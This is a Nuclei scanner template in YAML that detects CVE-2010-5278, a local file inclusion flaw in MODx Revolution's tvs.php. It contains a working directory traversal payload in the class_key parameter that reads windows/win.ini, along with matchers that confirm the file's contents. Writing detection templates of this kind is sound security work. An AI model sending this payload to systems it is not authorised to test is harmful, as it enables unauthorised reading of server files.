nuclei-templates/http/cves/2010/CVE-2010-5278.yaml

48 lines
1.5 KiB
YAML

id: CVE-2010-5278
info:
name: MODx manager - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.
remediation: |
Apply the latest patches and updates provided by MODx to fix the LFI vulnerability.
reference:
- https://www.exploit-db.com/exploits/34788
- https://nvd.nist.gov/vuln/detail/CVE-2010-5278
- http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt
- http://modxcms.com/forums/index.php/topic,55104.0.html
- http://modxcms.com/forums/index.php/topic,55105.msg317273.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2010-5278
cwe-id: CWE-22
epss-score: 0.04725
epss-percentile: 0.91601
cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: modx
product: modx_revolution
tags: cve,cve2010,lfi,edb,packetstorm
http:
- method: GET
path:
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
- type: status
status:
- 200